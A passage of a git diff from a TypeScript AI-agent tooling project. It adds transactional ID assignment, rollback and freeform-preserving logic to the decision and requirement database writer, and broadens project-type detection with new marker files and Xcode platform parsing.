ledger — use warning glyph for pressured units - const ledgerEntry = ledgerLookup.get(`${u.type}:${u.id}`); - const hadPressure = ledgerEntry?.continueHereFired === true; - const hadTruncation = (ledgerEntry?.truncationSections ?? 0) > 0; - const unitGlyph = hadPressure - ? th.fg(STATUS_COLOR.warning, STATUS_GLYPH.warning) - : th.fg(STATUS_COLOR.done, STATUS_GLYPH.done); - const left = ` ${unitGlyph} ${th.fg("muted", unitLabel(u.type))} ${th.fg("muted", u.id)}`; - - let budgetMarkers = ""; - if (hadTruncation) { - budgetMarkers += th.fg("warning", ` ▼${ledgerEntry!.truncationSections}`); - } - if (hadPressure) { - budgetMarkers += th.fg("error", " → wrap-up"); - } - - const right = th.fg("dim", formatDuration(u.finishedAt - u.startedAt)); - lines.push(row(joinColumns(`${left}${budgetMarkers}`, right, contentWidth))); - } - - if (this.dashData.completedUnits.length > 10) { - lines.push(row(th.fg("dim", ` ...and ${this.dashData.completedUnits.length - 10} more`))); - } - } - const ledger = getLedger(); if (ledger && ledger.units.length > 0) { const totals = getProjectTotals(ledger.units); @@ -603,6 +559,13 @@ export class GSDDashboardOverlay { if (cacheRate > 0) { lines.push(row(`${th.fg("dim", "cache hit rate:")} ${th.fg("text", `${cacheRate}%`)}`)); } + + if (this.dashData.rtkEnabled && this.dashData.rtkSavings && this.dashData.rtkSavings.commands > 0) { + const rtk = this.dashData.rtkSavings; + lines.push(row( + `${th.fg("dim", "rtk saved:")} ${th.fg("text", formatTokenCount(rtk.savedTokens))} ${th.fg("dim", `(${Math.round(rtk.savingsPct)}% · ${rtk.commands} cmd${rtk.commands === 1 ? "" : "s"})`)}`, + )); + } } // Environment health section (#1221) — only show issues diff --git a/src/resources/extensions/gsd/db-writer.ts b/src/resources/extensions/gsd/db-writer.ts index 2559d5e04..14bcb75b5 100644 --- a/src/resources/extensions/gsd/db-writer.ts +++ b/src/resources/extensions/gsd/db-writer.ts @@ -9,14 +9,68 @@ // parseDecisionsTable() and parseRequirementsSections() with field fidelity. import { join, resolve } from 'node:path'; +import { readFileSync, existsSync, statSync } from 'node:fs'; import type { Decision, Requirement } from './types.js'; import { resolveGsdRootFile } from './paths.js'; import { saveFile } from './files.js'; import { GSDError, GSD_STALE_STATE, GSD_IO_ERROR } from './errors.js'; +import { logWarning, logError } from './workflow-logger.js'; import { invalidateStateCache } from './state.js'; import { clearPathCache } from './paths.js'; import { clearParseCache } from './files.js'; +// ─── Freeform Detection ─────────────────────────────────────────────────── + +/** + * Detect whether a DECISIONS.md file is in canonical table format + * (generated by generateDecisionsMd). + * + * Returns true only if the file starts with the canonical header + * ("# Decisions Register") that generateDecisionsMd produces. + * Files with freeform content — even if they contain an appended + * decisions table section — return false so the freeform content + * is preserved. + */ +export function isDecisionsTableFormat(content: string): boolean { + // The canonical format always starts with "# Decisions Register" + const firstLine = content.split('\n')[0]?.trim() ?? ''; + if (firstLine !== '# Decisions Register') return false; + + // Additionally verify the file has the canonical table header + return content.includes('| # | When | Scope | Decision | Choice | Rationale | Revisable?'); +} + +/** + * Generate a minimal decisions table section (header + rows) for appending + * to a freeform DECISIONS.md file. + */ +function generateDecisionsAppendBlock(decisions: Decision[]): string { + const lines: string[] = []; + lines.push(''); + lines.push('---'); + lines.push(''); + lines.push('## Decisions Table'); + lines.push(''); + lines.push('| # | When | Scope | Decision | Choice | Rationale | Revisable? | Made By |'); + lines.push('|---|------|-------|----------|--------|-----------|------------|---------|'); + + for (const d of decisions) { + const cells = [ + d.id, + d.when_context, + d.scope, + d.decision, + d.choice, + d.rationale, + d.revisable, + d.made_by ?? 'agent', + ].map(cell => (cell ?? '').replace(/\|/g, '\\|')); + lines.push(`| ${cells.join(' | ')} |`); + } + + return lines.join('\n') + '\n'; +} + // ─── Markdown Generators ────────────────────────────────────────────────── /** @@ -168,11 +222,148 @@ export async function nextDecisionId(): Promise { const next = maxNum + 1; return `D${String(next).padStart(3, '0')}`; } catch (err) { - process.stderr.write(`gsd-db: nextDecisionId failed: ${(err as Error).message}\n`); + logError('manifest', 'nextDecisionId failed', { fn: 'nextDecisionId', error: String((err as Error).message) }); return 'D001'; } } +// ─── Next Requirement ID ───────────────────────────────────────────────── + +/** + * Compute the next requirement ID from the current DB state. + * Queries MAX(CAST(SUBSTR(id, 2) AS INTEGER)) from requirements table. + * Returns R001 if no requirements exist. Zero-pads to 3 digits. + */ +export async function nextRequirementId(): Promise { + try { + const db = await import('./gsd-db.js'); + const adapter = db._getAdapter(); + if (!adapter) return 'R001'; + + const row = adapter + .prepare('SELECT MAX(CAST(SUBSTR(id, 2) AS INTEGER)) as max_num FROM requirements') + .get(); + + const maxNum = row ? (row['max_num'] as number | null) : null; + if (maxNum == null || isNaN(maxNum)) return 'R001'; + + const next = maxNum + 1; + return `R${String(next).padStart(3, '0')}`; + } catch (err) { + logError('manifest', 'nextRequirementId failed', { fn: 'nextRequirementId', error: String((err as Error).message) }); + return 'R001'; + } +} + +// ─── Save Requirement to DB + Regenerate Markdown ──────────────────────── + +export interface SaveRequirementFields { + class: string; + status?: string; + description: string; + why: string; + source: string; + primary_owner?: string; + supporting_slices?: string; + validation?: string; + notes?: string; +} + +/** + * Save a new requirement to DB and regenerate REQUIREMENTS.md. + * Auto-assigns the next ID via nextRequirementId(). + * + * The ID computation and insert are wrapped in a single transaction + * to prevent parallel race conditions (same pattern as saveDecisionToDb). + * + * Returns the assigned ID. + */ +export async function saveRequirementToDb( + fields: SaveRequirementFields, + basePath: string, +): Promise<{ id: string }> { + try { + const db = await import('./gsd-db.js'); + + // Atomic ID assignment + insert inside a transaction. + const id = db.transaction(() => { + const adapter = db._getAdapter(); + if (!adapter) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open"); + + const row = adapter + .prepare('SELECT MAX(CAST(SUBSTR(id, 2) AS INTEGER)) as max_num FROM requirements') + .get(); + const maxNum = row ? (row['max_num'] as number | null) : null; + const nextId = (maxNum == null || isNaN(maxNum)) + ? 'R001' + : `R${String(maxNum + 1).padStart(3, '0')}`; + + const requirement: Requirement = { + id: nextId, + class: fields.class, + status: fields.status ?? 'active', + description: fields.description, + why: fields.why, + source: fields.source, + primary_owner: fields.primary_owner ?? '', + supporting_slices: fields.supporting_slices ?? '', + validation: fields.validation ?? '', + notes: fields.notes ?? '', + full_content: '', + superseded_by: null, + }; + + db.upsertRequirement(requirement); + return nextId; + }); + + // Fetch all requirements for full file regeneration + const adapter = db._getAdapter(); + let allRequirements: Requirement[] = []; + if (adapter) { + const rows = adapter.prepare('SELECT * FROM requirements ORDER BY id').all(); + allRequirements = rows.map(row => ({ + id: row['id'] as string, + class: row['class'] as string, + status: row['status'] as string, + description: row['description'] as string, + why: row['why'] as string, + source: row['source'] as string, + primary_owner: row['primary_owner'] as string, + supporting_slices: row['supporting_slices'] as string, + validation: row['validation'] as string, + notes: row['notes'] as string, + full_content: row['full_content'] as string, + superseded_by: (row['superseded_by'] as string) ?? null, + })); + } + + const nonSuperseded = allRequirements.filter(r => r.superseded_by == null); + const md = generateRequirementsMd(nonSuperseded); + const filePath = resolveGsdRootFile(basePath, 'REQUIREMENTS'); + try { + await saveFile(filePath, md); + } catch (diskErr) { + logError('manifest', 'disk write failed, rolling back DB row', { fn: 'saveRequirementToDb', error: String((diskErr as Error).message) }); + try { + const rollbackAdapter = db._getAdapter(); + rollbackAdapter?.prepare('DELETE FROM requirements WHERE id = :id').run({ ':id': id }); + } catch (rollbackErr) { + logError('manifest', 'SPLIT BRAIN: disk write failed AND DB rollback failed — DB has orphaned row', { fn: 'saveRequirementToDb', id, error: String((rollbackErr as Error).message) }); + } + throw diskErr; + } + invalidateStateCache(); + clearPathCache(); + clearParseCache(); + + return { id }; + } catch (err) { + logError('manifest', 'saveRequirementToDb failed', { fn: 'saveRequirementToDb', error: String((err as Error).message) }); + throw err; + } +} + // ─── Save Decision to DB + Regenerate Markdown ──────────────────────────── export interface SaveDecisionFields { @@ -188,6 +379,11 @@ export interface SaveDecisionFields { /** * Save a new decision to DB and regenerate DECISIONS.md. * Auto-assigns the next ID via nextDecisionId(). + * + * The ID computation (SELECT MAX) and insert are wrapped in a single + * transaction to prevent parallel tool calls from computing the same ID + * and silently overwriting each other (#3326, #3339, #3459). + * * Returns the assigned ID. */ export async function saveDecisionToDb( @@ -197,18 +393,33 @@ export async function saveDecisionToDb( try { const db = await import('./gsd-db.js'); - const id = await nextDecisionId(); + // Atomic ID assignment + insert inside a transaction to prevent + // parallel calls from racing on the same MAX(id) value. + const id = db.transaction(() => { + const adapter = db._getAdapter(); + if (!adapter) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open"); - db.upsertDecision({ - id, - when_context: fields.when_context ?? '', - scope: fields.scope, - decision: fields.decision, - choice: fields.choice, - rationale: fields.rationale, - revisable: fields.revisable ?? 'Yes', - made_by: fields.made_by ?? 'agent', - superseded_by: null, + const row = adapter + .prepare('SELECT MAX(CAST(SUBSTR(id, 2) AS INTEGER)) as max_num FROM decisions') + .get(); + const maxNum = row ? (row['max_num'] as number | null) : null; + const nextId = (maxNum == null || isNaN(maxNum)) + ? 'D001' + : `D${String(maxNum + 1).padStart(3, '0')}`; + + db.upsertDecision({ + id: nextId, + when_context: fields.when_context ?? '', + scope: fields.scope, + decision: fields.decision, + choice: fields.choice, + rationale: fields.rationale, + revisable: fields.revisable ?? 'Yes', + made_by: fields.made_by ?? 'agent', + superseded_by: null, + }); + + return nextId; }); // Fetch all decisions (including superseded for the full register) @@ -230,9 +441,59 @@ export async function saveDecisionToDb( })); } - const md = generateDecisionsMd(allDecisions); const filePath = resolveGsdRootFile(basePath, 'DECISIONS'); - await saveFile(filePath, md); + + // Check if existing DECISIONS.md has freeform (non-table) content. + // If so, preserve that content and append/update the decisions table + // at the end instead of overwriting the entire file. + let existingContent: string | null = null; + if (existsSync(filePath)) { + existingContent = readFileSync(filePath, 'utf-8'); + } + + let md: string; + if (existingContent && !isDecisionsTableFormat(existingContent)) { + // Freeform content detected — preserve it and append decisions table. + // Strip any previously appended decisions table section to avoid duplication. + const marker = '---\n\n## Decisions Table'; + const markerIdx = existingContent.indexOf(marker); + const freeformPart = markerIdx >= 0 + ? existingContent.substring(0, markerIdx).trimEnd() + : existingContent.trimEnd(); + md = freeformPart + '\n' + generateDecisionsAppendBlock(allDecisions); + } else { + // Table format or no existing file — full regeneration (original behavior) + md = generateDecisionsMd(allDecisions); + } + + try { + await saveFile(filePath, md); + } catch (diskErr) { + logError('manifest', 'disk write failed, rolling back DB row', { fn: 'saveDecisionToDb', error: String((diskErr as Error).message) }); + try { + adapter?.prepare('DELETE FROM decisions WHERE id = :id').run({ ':id': id }); + } catch (rollbackErr) { + logError('manifest', 'SPLIT BRAIN: disk write failed AND DB rollback failed — DB has orphaned row', { fn: 'saveDecisionToDb', id, error: String((rollbackErr as Error).message) }); + } + throw diskErr; + } + // #2661: When a decision defers a slice, update the slice status in the DB + // so the dispatcher skips it. Without this, STATE.md and DECISIONS.md are + // in split-brain: the decision says "deferred" but the state still says + // "active", causing auto-mode to keep dispatching the deferred work. + try { + const sliceRef = extractDeferredSliceRef(fields); + if (sliceRef) { + db.updateSliceStatus(sliceRef.milestoneId, sliceRef.sliceId, 'deferred'); + } + } catch (deferErr) { + // Non-fatal — log but don't fail the decision save + logError('manifest', 'failed to update deferred slice status', { + fn: 'saveDecisionToDb', + error: String((deferErr as Error).message), + }); + } + // Invalidate file-read caches so deriveState() sees the updated markdown. // Do NOT clear the artifacts table — we just wrote to it intentionally. invalidateStateCache(); @@ -241,11 +502,44 @@ export async function saveDecisionToDb( return { id }; } catch (err) { - process.stderr.write(`gsd-db: saveDecisionToDb failed: ${(err as Error).message}\n`); + logError('manifest', 'saveDecisionToDb failed', { fn: 'saveDecisionToDb', error: String((err as Error).message) }); throw err; } } +/** + * Extract a milestone/slice reference from a deferral decision. + * + * Detects deferrals by checking: + * - scope contains "defer" (e.g., "deferral", "defer") + * - choice or decision contains "defer" + an M###/S## pattern + * + * Returns { milestoneId, sliceId } if found, null otherwise. + */ +export function extractDeferredSliceRef( + fields: Pick, +): { milestoneId: string; sliceId: string } | null { + const isDeferral = + /\bdefer(?:ral|red|ring|s)?\b/i.test(fields.scope) || + /\bdefer(?:ral|red|ring|s)?\b/i.test(fields.choice) || + /\bdefer(?:ral|red|ring|s)?\b/i.test(fields.decision); + + if (!isDeferral) return null; + + // Look for M###/S## pattern in choice first, then decision + const slicePattern = /\b(M\d{3,4})\/(S\d{2,3})\b/; + const choiceMatch = fields.choice.match(slicePattern); + if (choiceMatch) { + return { milestoneId: choiceMatch[1], sliceId: choiceMatch[2] }; + } + const decisionMatch = fields.decision.match(slicePattern); + if (decisionMatch) { + return { milestoneId: decisionMatch[1], sliceId: decisionMatch[2] }; + } + + return null; +} + // ─── Update Requirement in DB + Regenerate Markdown ─────────────────────── /** @@ -260,16 +554,55 @@ export async function updateRequirementInDb( try { const db = await import('./gsd-db.js'); - const existing = db.getRequirementById(id); + let existing = db.getRequirementById(id); + + // If requirement doesn't exist in DB, seed the entire requirements table + // from REQUIREMENTS.md first (#3346). This handles the standard workflow + // where requirements are authored in markdown during discussion but never + // imported into the database — making gsd_requirement_update always fail + // with "not_found" at milestone completion. if (!existing) { - throw new GSDError(GSD_STALE_STATE, `Requirement ${id} not found`); + const reqFilePath = resolveGsdRootFile(basePath, 'REQUIREMENTS'); + try { + const content = readFileSync(reqFilePath, 'utf-8'); + const { parseRequirementsSections } = await import('./md-importer.js'); + const parsed = parseRequirementsSections(content); + if (parsed.length > 0) { + logWarning('manifest', `Seeding ${parsed.length} requirements from REQUIREMENTS.md into DB (first update triggers import)`, { fn: 'updateRequirementInDb' }); + for (const req of parsed) { + // Only seed if not already in DB (avoid overwriting concurrent inserts) + if (!db.getRequirementById(req.id)) { + db.upsertRequirement(req); + } + } + // Re-check after seeding + existing = db.getRequirementById(id); + } + } catch { + // REQUIREMENTS.md missing or unparseable — fall through to skeleton + } } - // Merge updates into existing + const base: Requirement = existing ?? { + id, + class: '', + status: 'active', + description: '', + why: '', + source: '', + primary_owner: '', + supporting_slices: '', + validation: '', + notes: '', + full_content: '', + superseded_by: null, + }; + + // Merge updates into existing (or skeleton) const merged: Requirement = { - ...existing, + ...base, ...updates, - id: existing.id, // ID cannot be changed + id: base.id, // ID cannot be changed }; db.upsertRequirement(merged); @@ -301,14 +634,22 @@ export async function updateRequirementInDb( const md = generateRequirementsMd(nonSuperseded); const filePath = resolveGsdRootFile(basePath, 'REQUIREMENTS'); - await saveFile(filePath, md); + try { + await saveFile(filePath, md); + } catch (diskErr) { + logError('manifest', 'disk write failed, reverting DB row', { fn: 'updateRequirementInDb', error: String((diskErr as Error).message) }); + if (existing) { + db.upsertRequirement(existing); + } + throw diskErr; + } // Invalidate file-read caches so deriveState() sees the updated markdown. // Do NOT clear the artifacts table — we just wrote to it intentionally. invalidateStateCache(); clearPathCache(); clearParseCache(); } catch (err) { - process.stderr.write(`gsd-db: updateRequirementInDb failed: ${(err as Error).message}\n`); + logError('manifest', 'updateRequirementInDb failed', { fn: 'updateRequirementInDb', error: String((err as Error).message) }); throw err; } } @@ -336,29 +677,55 @@ export async function saveArtifactToDb( try { const db = await import('./gsd-db.js'); + // Guard against path traversal before any reads/writes + const gsdDir = resolve(basePath, '.gsd'); + const fullPath = resolve(basePath, '.gsd', opts.path); + if (!fullPath.startsWith(gsdDir)) { + throw new GSDError(GSD_IO_ERROR, `saveArtifactToDb: path escapes .gsd/ directory: ${opts.path}`); + } + + // Shrinkage guard: if the file already exists and the new content is + // significantly smaller (<50%), preserve the richer file on disk and + // store its content in the DB instead of the abbreviated version. + let dbContent = opts.content; + let skipDiskWrite = false; + if (existsSync(fullPath)) { + const existingSize = statSync(fullPath).size; + const newSize = Buffer.byteLength(opts.content, 'utf-8'); + if (existingSize > 0 && newSize < existingSize * 0.5) { + logWarning('manifest', `new content (${newSize}B) is <50% of existing file (${existingSize}B), preserving disk file`, { fn: 'saveArtifactToDb', path: opts.path }); + dbContent = readFileSync(fullPath, 'utf-8'); + skipDiskWrite = true; + } + } + db.insertArtifact({ path: opts.path, artifact_type: opts.artifact_type, milestone_id: opts.milestone_id ?? null, slice_id: opts.slice_id ?? null, task_id: opts.task_id ?? null, - full_content: opts.content, + full_content: dbContent, }); - // Write the file to disk (guard against path traversal) - const gsdDir = resolve(basePath, '.gsd'); - const fullPath = resolve(basePath, '.gsd', opts.path); - if (!fullPath.startsWith(gsdDir)) { - throw new GSDError(GSD_IO_ERROR, `saveArtifactToDb: path escapes .gsd/ directory: ${opts.path}`); + // Write the file to disk (only if we're not preserving a richer existing file) + if (!skipDiskWrite) { + try { + await saveFile(fullPath, opts.content); + } catch (diskErr) { + logError('manifest', 'disk write failed, rolling back DB row', { fn: 'saveArtifactToDb', error: String((diskErr as Error).message) }); + const rollbackAdapter = db._getAdapter(); + rollbackAdapter?.prepare('DELETE FROM artifacts WHERE path = :path').run({ ':path': opts.path }); + throw diskErr; + } } - await saveFile(fullPath, opts.content); // Invalidate file-read caches so deriveState() sees the updated markdown. // Do NOT clear the artifacts table — we just wrote to it intentionally. invalidateStateCache(); clearPathCache(); clearParseCache(); } catch (err) { - process.stderr.write(`gsd-db: saveArtifactToDb failed: ${(err as Error).message}\n`); + logError('manifest', 'saveArtifactToDb failed', { fn: 'saveArtifactToDb', error: String((err as Error).message) }); throw err; } } diff --git a/src/resources/extensions/gsd/detection.ts b/src/resources/extensions/gsd/detection.ts index 9a0c159eb..3cfa9bdb8 100644 --- a/src/resources/extensions/gsd/detection.ts +++ b/src/resources/extensions/gsd/detection.ts @@ -6,7 +6,7 @@ * flow to show when entering a project directory. */ -import { existsSync, readdirSync, readFileSync, statSync } from "node:fs"; +import { existsSync, openSync, readSync, closeSync, readdirSync, readFileSync, statSync } from "node:fs"; import { join } from "node:path"; import { homedir } from "node:os"; import { gsdRoot } from "./paths.js"; @@ -48,6 +48,9 @@ export interface V2Detection { hasContext: boolean; } +/** Apple platform SDKROOTs found in Xcode project.pbxproj files. */ +export type XcodePlatform = "iphoneos" | "macosx" | "watchos" | "appletvos" | "xros"; + export interface ProjectSignals { /** Detected project/package files */ detectedFiles: string[]; @@ -57,6 +60,8 @@ export interface ProjectSignals { isMonorepo: boolean; /** Primary language hint */ primaryLanguage?: string; + /** Apple platform SDKROOTs detected from *.xcodeproj/project.pbxproj */ + xcodePlatforms: XcodePlatform[]; /** Has existing CI configuration? */ hasCI: boolean; /** Has existing test setup? */ @@ -87,8 +92,91 @@ export const PROJECT_FILES = [ "mix.exs", "deno.json", "deno.jsonc", + // .NET + ".sln", + ".csproj", + "Directory.Build.props", + // Git submodules + ".gitmodules", + // Xcode + "project.yml", + ".xcodeproj", + ".xcworkspace", + // Cloud platform config files + "firebase.json", + "cdk.json", + "samconfig.toml", + "serverless.yml", + "serverless.yaml", + "azure-pipelines.yml", + // Database / ORM config files + "prisma/schema.prisma", + "supabase/config.toml", + "drizzle.config.ts", + "drizzle.config.js", + "redis.conf", + // React Native markers + "metro.config.js", + "metro.config.ts", + "react-native.config.js", + // Frontend framework config files + "angular.json", + "next.config.js", + "next.config.ts", + "next.config.mjs", + "nuxt.config.ts", + "nuxt.config.js", + "svelte.config.js", + "svelte.config.ts", + // Vue CLI config files + "vue.config.js", + "vue.config.ts", + // Frontend tooling + "tailwind.config.js", + "tailwind.config.ts", + "tailwind.config.mjs", + "tailwind.config.cjs", + // Android project markers + "app/build.gradle", + "app/build.gradle.kts", + // Container / DevOps config files + "Dockerfile", + "docker-compose.yml", + "docker-compose.yaml", + // Infrastructure as Code + "main.tf", + // Kubernetes / Helm markers + "Chart.yaml", + "kustomization.yaml", + // CI/CD markers + ".github/workflows", + // Blockchain / Web3 markers + "hardhat.config.js", + "hardhat.config.ts", + "foundry.toml", + // Data engineering markers + "dbt_project.yml", + "airflow.cfg", + // Game engine markers + "ProjectSettings/ProjectVersion.txt", + "project.godot", + // Python framework markers + "manage.py", + "requirements.txt", ] as const; +/** File extensions that indicate SQLite databases in the project. */ +const SQLITE_EXTENSIONS = [".sqlite", ".sqlite3", ".db"] as const; + +/** File extensions that indicate SQL usage (migrations, schemas, seeds). */ +const SQL_EXTENSIONS = [".sql"] as const; + +/** File extensions that indicate .NET / C# projects. */ +const DOTNET_EXTENSIONS = [".csproj", ".sln", ".fsproj"] as const; + +/** File extensions that indicate Vue.js single-file components. */ +const VUE_EXTENSIONS = [".vue"] as const; + const LANGUAGE_MAP: Record = { "package.json": "javascript/typescript", "Cargo.toml": "rust", @@ -99,6 +187,8 @@ const LANGUAGE_MAP: Record = { "pom.xml": "java", "build.gradle": "java/kotlin", "build.gradle.kts": "kotlin", + "app/build.gradle": "java/kotlin", + "app/build.gradle.kts": "kotlin", "CMakeLists.txt": "c/c++", "composer.json": "php", "pubspec.yaml": "dart/flutter", @@ -106,6 +196,15 @@ const LANGUAGE_MAP: Record = { "mix.exs": "elixir", "deno.json": "typescript/deno", "deno.jsonc": "typescript/deno", + ".sln": "dotnet", + ".csproj": "dotnet", + "Directory.Build.props": "dotnet", + "project.yml": "swift/xcode", + ".xcodeproj": "swift/xcode", + ".xcworkspace": "swift/xcode", + "Dockerfile": "docker", + "manage.py": "python", + "requirements.txt": "python", }; const MONOREPO_MARKERS = [ @@ -140,6 +239,50 @@ const TEST_MARKERS = [ "phpunit.xml", ] as const; +/** Directories skipped during bounded recursive project scans. */ +const RECURSIVE_SCAN_IGNORED_DIRS = new Set([ + ".git", + ".gsd", + ".planning", + ".plans", + ".claude", + ".cursor", + ".vscode", + "node_modules", + ".venv", + "venv", + "dist", + "build", + "coverage", + ".next", + ".nuxt", + "target", + "vendor", + ".turbo", + "Pods", + "bin", + "obj", + ".gradle", + "DerivedData", + "out", +]) as ReadonlySet; + +/** Project file markers safe to detect recursively via suffix matching. */ +const ROOT_ONLY_PROJECT_FILES = new Set([ + ".github/workflows", + "package.json", + "Gemfile", + "Makefile", + "CMakeLists.txt", + "build.gradle", + "build.gradle.kts", + "deno.json", + "deno.jsonc", +]); + +const MAX_RECURSIVE_SCAN_FILES = 2000; +const MAX_RECURSIVE_SCAN_DEPTH = 6; + // ─── Core Detection ───────────────────────────────────────────────────────────── /** @@ -222,8 +365,8 @@ function detectV2Gsd(basePath: string): V2Detection | null { if (!existsSync(gsdPath)) return null; const hasPreferences = - existsSync(join(gsdPath, "preferences.md")) || - existsSync(join(gsdPath, "PREFERENCES.md")); + existsSync(join(gsdPath, "PREFERENCES.md")) || + existsSync(join(gsdPath, "preferences.md")); const hasContext = existsSync(join(gsdPath, "CONTEXT.md")); @@ -261,9 +404,88 @@ export function detectProjectSignals(basePath: string): ProjectSignals { } } + // Bounded recursive scan for nested markers and dependency files. + // This covers common brownfield layouts like src/App/App.csproj, + // db/migrations/*.sql, src/components/*.vue, and services/api/pyproject.toml + // without walking the entire repo or diving into heavyweight folders. + const scannedFiles = scanProjectFiles(basePath); + + for (const file of PROJECT_FILES) { + if (detectedFiles.includes(file) || ROOT_ONLY_PROJECT_FILES.has(file)) continue; + const hasMatch = file === "requirements.txt" + ? scannedFiles.some(isPythonRequirementsFile) + : scannedFiles.some((scannedFile) => matchesProjectFileMarker(scannedFile, file)); + if (hasMatch) { + pushUnique(detectedFiles, file); + if (!primaryLanguage && LANGUAGE_MAP[file]) { + primaryLanguage = LANGUAGE_MAP[file]; + } + } + } + + if (scannedFiles.some((file) => SQLITE_EXTENSIONS.some((ext) => file.endsWith(ext)))) { + pushUnique(detectedFiles, "*.sqlite"); + } + if (scannedFiles.some((file) => SQL_EXTENSIONS.some((ext) => file.endsWith(ext)))) { + pushUnique(detectedFiles, "*.sql"); + } + + const hasCsproj = scannedFiles.some((file) => file.endsWith(".csproj")); + const hasFsproj = scannedFiles.some((file) => file.endsWith(".fsproj")); + const hasSln = scannedFiles.some((file) => file.endsWith(".sln")); + + if (hasCsproj) { + pushUnique(detectedFiles, "*.csproj"); + if (!primaryLanguage) primaryLanguage = "csharp"; + } + if (hasFsproj) { + pushUnique(detectedFiles, "*.fsproj"); + if (!primaryLanguage) primaryLanguage = "fsharp"; + } + if (hasSln) { + pushUnique(detectedFiles, "*.sln"); + if (!primaryLanguage) primaryLanguage = "dotnet"; + } + + if (scannedFiles.some((file) => VUE_EXTENSIONS.some((ext) => file.endsWith(ext)))) { + pushUnique(detectedFiles, "*.vue"); + } + + // Python framework detection — scan dependency files for framework-specific packages. + // Adds synthetic markers (e.g. "dep:fastapi") so skill catalog matchFiles can reference them. + const dependencyFiles = scannedFiles.filter((file) => + isPythonRequirementsFile(file) || file.endsWith("pyproject.toml"), + ); + if (containsFastapiDependency(basePath, dependencyFiles)) { + pushUnique(detectedFiles, "dep:fastapi"); + } + + const springBootBuildFiles = scannedFiles.filter((file) => + file.endsWith("pom.xml") || file.endsWith("build.gradle") || file.endsWith("build.gradle.kts"), + ); + const springBootVersionCatalogs = scannedFiles.filter((file) => file.endsWith(".versions.toml")); + const springBootSettingsFiles = scannedFiles.filter((file) => + file.endsWith("settings.gradle") || file.endsWith("settings.gradle.kts"), + ); + if (containsSpringBootMarker(basePath, springBootBuildFiles, springBootVersionCatalogs, springBootSettingsFiles)) { + pushUnique(detectedFiles, "dep:spring-boot"); + if (!primaryLanguage) { + primaryLanguage = "java/kotlin"; + } + } + // Git repo detection const isGitRepo = existsSync(join(basePath, ".git")); + // Xcode platform detection — parse SDKROOT from project.pbxproj + const xcodePlatforms = detectXcodePlatforms(basePath); + + // Set primaryLanguage to swift when an Xcode project is found but no + // Package.swift was detected (CocoaPods or SPM-less projects). + if (!primaryLanguage && xcodePlatforms.length > 0) { + primaryLanguage = "swift"; + } + // Monorepo detection let isMonorepo = false; for (const marker of MONOREPO_MARKERS) { @@ -306,6 +528,7 @@ export function detectProjectSignals(basePath: string): ProjectSignals { isGitRepo, isMonorepo, primaryLanguage, + xcodePlatforms, hasCI, hasTests, packageManager, @@ -313,6 +536,100 @@ export function detectProjectSignals(basePath: string): ProjectSignals { }; } +// ─── Xcode Platform Detection ─────────────────────────────────────────────────── + +/** Known SDKROOT values → canonical platform names. */ +const SDKROOT_MAP: Record = { + iphoneos: "iphoneos", + iphonesimulator: "iphoneos", // simulator builds still target iOS + macosx: "macosx", + watchos: "watchos", + watchsimulator: "watchos", + appletvos: "appletvos", + appletvsimulator: "appletvos", + xros: "xros", + xrsimulator: "xros", +}; + +/** Regex for SUPPORTED_PLATFORMS — fallback when SDKROOT = auto (Xcode 15+). */ +const SUPPORTED_PLATFORMS_RE = /SUPPORTED_PLATFORMS\s*=\s*"([^"]+)"/gi; + +/** Read at most `maxBytes` from a file without loading the full file into memory. */ +function readBounded(filePath: string, maxBytes: number): string { + const buf = Buffer.alloc(maxBytes); + const fd = openSync(filePath, "r"); + try { + const bytesRead = readSync(fd, buf, 0, maxBytes, 0); + return buf.toString("utf-8", 0, bytesRead); + } finally { + closeSync(fd); + } +} + +/** Common subdirectories where .xcodeproj may live in monorepos / standard layouts. */ +const XCODE_SUBDIRS = ["ios", "macos", "app", "apps"] as const; + +/** + * Scan *.xcodeproj directories for project.pbxproj and extract SDKROOT values. + * Returns deduplicated, canonical platform list (e.g. ["iphoneos"]). + * + * Reading the pbxproj is a lightweight regex scan — no full plist parsing needed. + * We read at most 1 MB per file to keep detection fast. + * Searches both the project root and common subdirectories (ios/, macos/, app/). + */ +function detectXcodePlatforms(basePath: string): XcodePlatform[] { + const platforms = new Set(); + + // Directories to scan: project root + common subdirs + const dirsToScan = [basePath]; + for (const sub of XCODE_SUBDIRS) { + const subPath = join(basePath, sub); + if (existsSync(subPath)) dirsToScan.push(subPath); + } + + for (const dir of dirsToScan) { + try { + const entries = readdirSync(dir, { withFileTypes: true }); + for (const entry of entries) { + if (!entry.isDirectory() || !entry.name.endsWith(".xcodeproj")) continue; + const pbxprojPath = join(dir, entry.name, "project.pbxproj"); + try { + const content = readBounded(pbxprojPath, 1024 * 1024); + // Match SDKROOT = ; — both quoted and unquoted forms + const sdkRe = /SDKROOT\s*=\s*"?([a-z]+)"?\s*;/gi; + let m: RegExpExecArray | null; + let foundExplicit = false; + while ((m = sdkRe.exec(content)) !== null) { + const val = m[1].toLowerCase(); + if (val === "auto") continue; // handled below via SUPPORTED_PLATFORMS + const canonical = SDKROOT_MAP[val]; + if (canonical) { + platforms.add(canonical); + foundExplicit = true; + } + } + // Xcode 15+ defaults SDKROOT to "auto"; fall back to SUPPORTED_PLATFORMS + if (!foundExplicit) { + let sp: RegExpExecArray | null; + while ((sp = SUPPORTED_PLATFORMS_RE.exec(content)) !== null) { + for (const tok of sp[1].split(/\s+/)) { + const canonical = SDKROOT_MAP[tok.toLowerCase()]; + if (canonical) platforms.add(canonical); + } + } + SUPPORTED_PLATFORMS_RE.lastIndex = 0; + } + } catch { + // unreadable pbxproj — skip + } + } + } catch { + // unreadable directory + } + } + return [...platforms]; +} + // ─── Package Manager Detection ────────────────────────────────────────────────── function detectPackageManager(basePath: string): string | undefined { @@ -373,7 +690,7 @@ function detectVerificationCommands( commands.push("go vet ./..."); } - if (detectedFiles.includes("pyproject.toml") || detectedFiles.includes("setup.py")) { + if (detectedFiles.includes("pyproject.toml") || detectedFiles.includes("setup.py") || detectedFiles.includes("requirements.txt")) { commands.push("pytest"); } @@ -403,8 +720,8 @@ function detectVerificationCommands( */ export function hasGlobalSetup(): boolean { return ( - existsSync(join(gsdHome, "preferences.md")) || - existsSync(join(gsdHome, "PREFERENCES.md")) + existsSync(join(gsdHome, "PREFERENCES.md")) || + existsSync(join(gsdHome, "preferences.md")) ); } @@ -417,8 +734,8 @@ export function isFirstEverLaunch(): boolean { // If we have preferences, not first launch if ( - existsSync(join(gsdHome, "preferences.md")) || - 